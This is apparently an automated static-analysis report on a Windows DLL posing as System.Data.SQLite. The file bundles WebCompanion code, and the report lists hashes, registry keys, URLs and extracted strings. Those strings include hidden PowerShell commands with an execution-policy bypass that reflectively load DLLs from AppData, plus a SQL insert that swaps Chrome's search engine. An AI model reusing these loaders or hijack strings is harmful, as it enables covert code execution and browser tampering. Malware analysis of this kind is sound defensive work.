PESCAN.IO - Analysis Report

PREMIUM PESCAN.IO - Analysis Report

File Structure

PE Chart Code

Header PE (light blue)

Executable sections (pink)

Non-executable sections (black)

External injected code (red)

File Structure in red = malformed or corrupted header

Chart Code For Other Files

Printable characters (blue)

Non-printable characters (black)

Information

Size: 925,63 KB
SHA-256 Hash: 014CDD4423EC219A119B542710C3D6A10D39747C9DED474D0F62B85215A08B31
SHA-1 Hash: 00E213992DB56C2399F1A22E1CB8FE2D3EDDCC02
MD5 Hash: E4E07A795A478E598C29B5F9A000CA73
Imphash: DAE02F32A21E03CE65412F6E56942DAA
MajorOSVersion: 4
MinorOSVersion: 0
CheckSum: 00055768
EntryPoint (rva): 42E7E
SizeOfHeaders: 1000
SizeOfImage: 48000
ImageBase: 400000
Architecture: x86
ImportTable: 42E30
IAT: 2000
Characteristics: 2102
TimeDateStamp: 532A03EF
Date: 19/03/2014 20:54:07
File Type: DLL
Number Of Sections: 3
ASLR: Enabled
Section Names: .text, .rsrc, .reloc
Number Of Executable Sections: 1
Subsystem: Windows Console

Sections Info

Section Name	Flags	ROffset	RSize	VOffset	VSize	Entropy	Chi2
.text	0x60000020 Code Executable Readable	1000	41000	2000	40E84	5.9825	3923556.17
.rsrc	0x40000040 Initialized Data Readable	42000	1000	44000	420	1.0833	830322.5
.reloc	0x42000040 Initialized Data GP-Relative Readable	43000	1000	46000	C	0.0164	1041921.88

Description

OriginalFilename: System.Data.SQLite.dll
CompanyName: http://system.data.sqlite.org/
LegalCopyright: Public Domain
LegalTrademarks: (R) WebCompanion
ProductName: System.Data.SQLite
FileVersion: 1.0.92.0
FileDescription: System.Data.SQLite Core
ProductVersion: 1.0.92.0
Comments: ADO.NET Data Provider for SQLite
Language: Unknown (ID=0x0)
CodePage: Unicode (UTF-16 LE) (0x4B0)

Binder/Joiner/Crypter

Dropper code detected (EOF) - 637,63 KB

Entry Point

The section number (1) - (.text) have the Entry Point
Information -> EntryPoint (calculated) - 41E7E
Code -> FF25002040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

Assembler

|JMP DWORD PTR [0X402000]

|ADD BYTE PTR [EAX], AL

Signatures

CheckSum Integrity Problem:
• Header: 350056
• Calculated: 1003996
Certificate - Digital Signature:
• The file is not signed

Packer/Compiler

Compiler: Microsoft Visual .NET - (You can use a decompiler for this...)
• AnyCPU: True
• Version: v2.0
Compiler: Microsoft Visual Studio
Detect It Easy (die)
• PE: Protector: Eziriz .NET Reactor(6.x.x.x)[By Dr.FarFar]
• PE: library: .NET(v2.0.50727)[-]
• PE: linker: Microsoft Linker(8.0)[-]
• PE: Sign tool: Windows Authenticode(2.0)[PKCS 7]
• Entropy: 5.62325

Windows REG (UNICODE)

SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Blaze Media Inc\Secure Browser\
SOFTWARE\BlazeMedia\Update\Clients\
SOFTWARE\Clients\StartMenuInternet
SOFTWARE\Clients\startmenuinternet\
Software\Microsoft\
Software\Google\
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
SOFTWARE\WOW6432Node\Clients\StartMenuInternet
SOFTWARE\Microsoft\Windows NT\CurrentVersion1
Rebuilt string - SOFTWARE\Policies\Microsoft\Windows\System
Rebuilt string - SOFTWARE\Microsoft\Windows\CurrentVersion\Run

File Access

mscoree.dll
MozCompressor.dll
SQLite.Interop.dll
WebCompanion.Lib.Newtonsoft.Json.dll
WebCompanion.Merged.dll
WebCompanion.Lib.ICSharpCode.SharpZipLib.dll
WebCompanion.Lib.LZ4.dll
user32.dll
kernel32.dll
advapi32.dll
System.Data.SQLite.dll
WebCompanion.Lib.Sys
MessageIdESystem.Runtime.Serialization.Dat
Microsoft.VSDesigner.Dat
Microsoft.VSDesigner.Dat
U(System.Dat
UjSystem.Data.IsolationLevel, System.Dat
UjSystem.Dat
USystem.Dat
U$System.Dat
System.Dat
UkSystem.Data.UpdateRowSource, System.Dat
UkSystem.Dat
UgSystem.Data.CommandType, System.Dat
UgSystem.Dat
Microsoft.VSDesigner.Dat
WebCompanion.Lib.System.Dat
\dev\sqlite\dotnet\obj\2008\Release\System.Dat
cSystem.Dat
System.Dat
//system.dat
System.Dat
ICSharpCode.SharpZipLib.Zip
Temp
AppData

File Access (UNICODE)

System.Dat
DbProviderServices, System.Dat
Objects.Dat
Interop.dll
SQLite.dll
WebCompanion.dll
/edge/x86/node.exe
0\powershell.exe
?StandardFilesRestorer.Exe
launcher.exe
chrome.exe
firefox.exe
iexplore.exe
TaskScheduler.Exe
updater.exe
\BBWC\S10.dll
Updater10.dll
CSharp.dll
Wdownlevel\api-ms-win-crt-runtime-l1-1-0.dll
Capi-ms-win-crt-runtime-l1-1-0.dll
.System.Dat
cSystem.Dat
YSystem.Dat
7System.Dat
/System.Dat
ComponentModel.Dat
!intermediate.dat
version.dat
//system.dat
+System.Dat
TaskScheduler.Log
.log\app.log
Recover.txt
ProfileInfo.txt
EventConfig.txt
SearchData.txt
!SearchConfig.zip
Exec - powershell.exe sC:\Windows\System32\WindowsPowerShell\v1.0\
Exec - powershell.exe 3SetupUpdaterScheduledTask
Temp
ProgramFiles
AppData

SQL Queries

SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'table' OR [type] LIKE 'view'3SELECT * FROM [{0}].[{1}]
SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'table'=PRAGMA [{0}].table_info([{1}])
SELECT * FROM [{0}].[{2}] WHERE [type] LIKE 'index' AND [name] LIKE '{1}''''sqlite_autoindex_
SELECT [type], [name], [tbl_name], [rootpage], [sql], [rowid] FROM [{0}].[{1}] WHERE [type] LIKE 'trigger'Tables
SELECT [type], [name], [tbl_name], [rootpage], [sql], [rowid] FROM [{0}].[{1}] WHERE [type] LIKE 'table'SQLITE_
SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'view' AS
SELECT * FROM [{0}].[{2}] WHERE [type] LIKE 'index' AND [tbl_name] LIKE '{1}'DESC
SELECT {0} FROM [{1}].[{2}] WHERE ROWID = ?
Select * From Win32_Process Where ProcessID =
SELECT CommandLine FROM Win32_Process WHERE ProcessId =
SELECT * FROM Win32_OperatingSystem
SELECT count(*) FROM keywords WHERE short_name='Chrome Search'
SELECT * FROM [{0}].[{1}]
SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'table' OR [type] LIKE 'view'
SELECT * FROM [{0}].[{2}] WHERE [type] LIKE 'index' AND [name] LIKE '{1}'
SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'table'
SELECT [type], [name], [tbl_name], [rootpage], [sql], [rowid] FROM [{0}].[{1}] WHERE [type] LIKE 'trigger'
SELECT [type], [name], [tbl_name], [rootpage], [sql], [rowid] FROM [{0}].[{1}] WHERE [type] LIKE 'table'
SELECT * FROM [{0}].[{1}] WHERE [type] LIKE 'view'
SELECT * FROM [{0}].[{2}] WHERE [type] LIKE 'index' AND [tbl_name] LIKE '{1}'
CREATE TABLE {0}(x);

Interest's Words

zombie
Encrypt
Decrypt
Encryption
PassWord
<meta
exec
createobject
unescape
attrib
start
cipher
hostname
shutdown
systeminfo
ping
expand
replace

Interest's Words (UNICODE)

taskkill
Encrypt
Decrypt
Encryption
PassWord
exec
powershell
taskkill
attrib
start
shutdown
ping
expand
replace

URLs

http://system.data.sqlite.org/
http://ocsp.entrust.net00
http://crl.entrust.net/g2ca.crl
http://www.entrust.net/rpa0
http://ocsp.entrust.net05
http://aia.entrust.net/evcs1-chain256.cer
http://crl.entrust.net/evcs1.crl
http://www.digicert.com/CPS0
http://crl3.digicert.com/sha2-assured-ts.crl
http://crl4.digicert.com/sha2-assured-ts.crl
http://ocsp.digicert.com
http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt
http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt
http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl
http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
http://cacerts.digicert.com/DigiCertTrustedRootG4.crt
http://crl3.digicert.com/DigiCertTrustedRootG4.crl
http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
http://www.digicert.com/CPS0
http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt
http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl
http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt
https://www.entrust.net/rpa0
https://www.digicert.com/CPS0

URLs (UNICODE)

http://system.data.sqlite.org/
http://dkf201.com
http://wzp9182.com
http://d2vtta4ibs40qt.cloudfront.net
http://api.bing.com/osjson.aspx?query={searchTerms}
http://www.mozilla.org/2006/browser/search/
http://api.bing.com/osjson.aspx?query={searchTerms}', 20, '
http://rt.webcompanion.com/notifications/download/rt/searchenginetemplate.xml
http://www.w3.org/2000/xmlns/
http://james.newtonking.com/projects/json
https://{0}?{1}
https://www.{0}/favicon.ico
https://www.search-get.com/favicon.ico', '
https://search-get.com/wc/search?q={searchTerms}&src=chrome', 1, '', 'UTF-8', 'http://api.bing.com/osjson.aspx?query={searchTerms}', 20, '

Emails

robert@blackcastlesoft.com

IP Addresses

1.0.92.0
15.0.0.0

Strings/Hex Code Found With The File Rules

Rule Type	Encoding	Matched (Word)
Text	Unicode	Unicode escape - \u00 - (Common Unicode escape sequences)
Text	Ascii	WinAPI Sockets (bind)
Text	Unicode	WinAPI Sockets (bind)
Text	Ascii	WinAPI Sockets (connect)
Text	Unicode	WinAPI Sockets (connect)
Text	Ascii	WinAPI Sockets (send)
Text	Ascii	Registry (RegOpenKeyEx)
Text	Ascii	File (GetTempPath)
Text	Ascii	File (CreateFile)
Text	Ascii	Encryption (Base64Encode)
Text	Ascii	Encryption (Blowfish)
Text	Ascii	Encryption (CipherMode)
Text	Ascii	Encryption (CreateDecryptor)
Text	Ascii	Encryption (CryptoStream)
Text	Ascii	Encryption (CryptoStreamMode)
Text	Ascii	Encryption (DotfuscatorAttribute)
Text	Ascii	Encryption (FromBase64String)
Text	Ascii	Encryption (ICryptoTransform)
Text	Ascii	Encryption (MD5CryptoServiceProvider)
Text	Ascii	Encryption (RNGCryptoServiceProvider)
Text	Ascii	Encryption (Rijndael)
Text	Ascii	Encryption (RijndaelManaged)
Text	Ascii	Encryption (ToBase64String)
Text	Ascii	Encryption (Twofish)
Text	Ascii	Anti-Analysis VM (GetVersion)
Text	Ascii	Execution (ShellExecute)
Text	Unicode	Software that records user activity (Logger)
Text	Ascii	Malicious rerouting of traffic to an attacker-controlled site (Redirect)
Entry Point	Hex Pattern	Microsoft Visual C / Basic .NET
Entry Point	Hex Pattern	Microsoft Visual C++ 8
Entry Point	Hex Pattern	Microsoft Visual C++ 8.0
Entry Point	Hex Pattern	Microsoft Visual C v7.0 / Basic .NET
Entry Point	Hex Pattern	Microsoft Visual Studio .NET
Entry Point	Hex Pattern	.NET executable
Entry Point	Hex Pattern	TrueVision Targa Graphics format

Resources

Path	DataRVA	Size	FileOffset	Code	Text
\VERSION\1\0	44058	3C8	42058	C80334000000560053005F00560045005200530049004F004E005F0049004E0046004F0000000000BD04EFFE000001000000	..4...V.S._.V.E.R.S.I.O.N._.I.N.F.O...............

Intelligent String

• WebCompanion.dll
• http://james.newtonking.com/projects/json
• 1.0.92.0
• _CorDllMainmscoree.dll
• .dll
• -r.psj
• .psj
• c:\dev\sqlite\dotnet\obj\2008\Release\System.Data.SQLite.pdb
• BrQt
• I0G08
• updater.exe
• .log\app.log
• http://dkf201.com
• http://wzp9182.com
• http://d2vtta4ibs40qt.cloudfront.net
• SearchData.txt
• Capi-ms-win-crt-runtime-l1-1-0.dll
• Wdownlevel\api-ms-win-crt-runtime-l1-1-0.dll
• version.dat
• !intermediate.dat
• \u0085
• -WindowStyle Hidden -ExecutionPolicy bypass -c "& ./edge/x86/node.exe ./edge/update.js --delay=350;$w="$env:APPDATA"+'\BBWC\';$f='Updater10.dll';if(Test-Path -Path $f){[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+$f));$i=new-object u.U;$i.ST()}"
• -WindowStyle Hidden -ExecutionPolicy bypass -c "& ./edge/x86/node.exe ./edge/update.js --delay=900"
• C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
• C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
• -WindowStyle Hidden -ExecutionPolicy bypass -c "$f="$env:APPDATA"+'\BBWC\S10.dll';if(Test-Path -Path $f){[Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes($w+$f));[E.S]::A('b')}else{& ./edge/x86/node.exe ./edge/startup.js}"
• -WindowStyle Hidden -ExecutionPolicy bypass -c "& ./edge/x86/node.exe ./edge/startup.js"
• .tmp
• http://api.bing.com/osjson.aspx?query={searchTerms}
• https://www.{0}/favicon.ico
• iexplore.exe
• firefox.exe
• chrome.exe
• launcher.exe
• .exe
• ) insert into keywords ( short_name,keyword, favicon_url, url, safe_for_autoreplace, originating_url, input_encodings, suggest_url, prepopulate_id, sync_guid, alternate_urls, image_url, search_url_post_params, suggest_url_post_params, image_url_post_params, new_tab_url) VALUES ('Chrome Search', 'Chrome Search', 'https://www.search-get.com/favicon.ico', 'https://search-get.com/wc/search?q={searchTerms}&src=chrome', 1, '', 'UTF-8', 'http://api.bing.com/osjson.aspx?query={searchTerms}', 20, '
• bing.com
• %mysearchengine.xml
• .xml
• http://rt.webcompanion.com/notifications/download/rt/searchenginetemplate.xml
• EventConfig.txt
• ProfileInfo.txt
• Recover.txt
• !SearchConfig.zip
• 1searchenginetemplate.xml
• {0}.{1}{2}.tmp
• themes/alert-icon.svg
• webcompaionreimageicon.ico
• webcompanionicon.ico
• webcompanionicon_pro.ico
• Z:\Documents\bidmonitor\web-companion\WebCompanion\bin\Release\Dotfuscated\WebCompanion.Merged.pdb
• :060U00Uq]dL.g?O0U0E1-Q!m0U0y+m0k0$+0http://ocsp.digicert.com0C+07http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0EU>0<0:864http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0U

Flow Anomalies

Offset	RVA	Section	Description
206DC	A25ED	.text	JMP [static] \| Indirect jump to absolute memory address
41E7E	402000	.text	JMP [static] \| Indirect jump to absolute memory address
60C94	4D20000	padding	JMP [static] \| Indirect jump to absolute memory address
71435	4D20000	padding	CALL [static] \| Indirect call to absolute memory address
71AE0	165714	padding	CALL [static] \| Indirect call to absolute memory address
8E0E4	6890000	padding	JMP [static] \| Indirect jump to absolute memory address
9FB2A	2051D	padding	CALL [static] \| Indirect call to absolute memory address
E408E	402000	padding	JMP [static] \| Indirect jump to absolute memory address
E6C80	2C279963	padding	JMP [static] \| Indirect jump to absolute memory address
44000	N/A	Overlay	B01F00000002020030821FA006092A864886F70D \| ........0.....*.H...

Extra Analysis

Metric	Value	Percentage
Ascii Code	510480	53,8571%
Null Byte Code	308110	32,5065%

PREMIUM PESCAN.IO - Analysis Report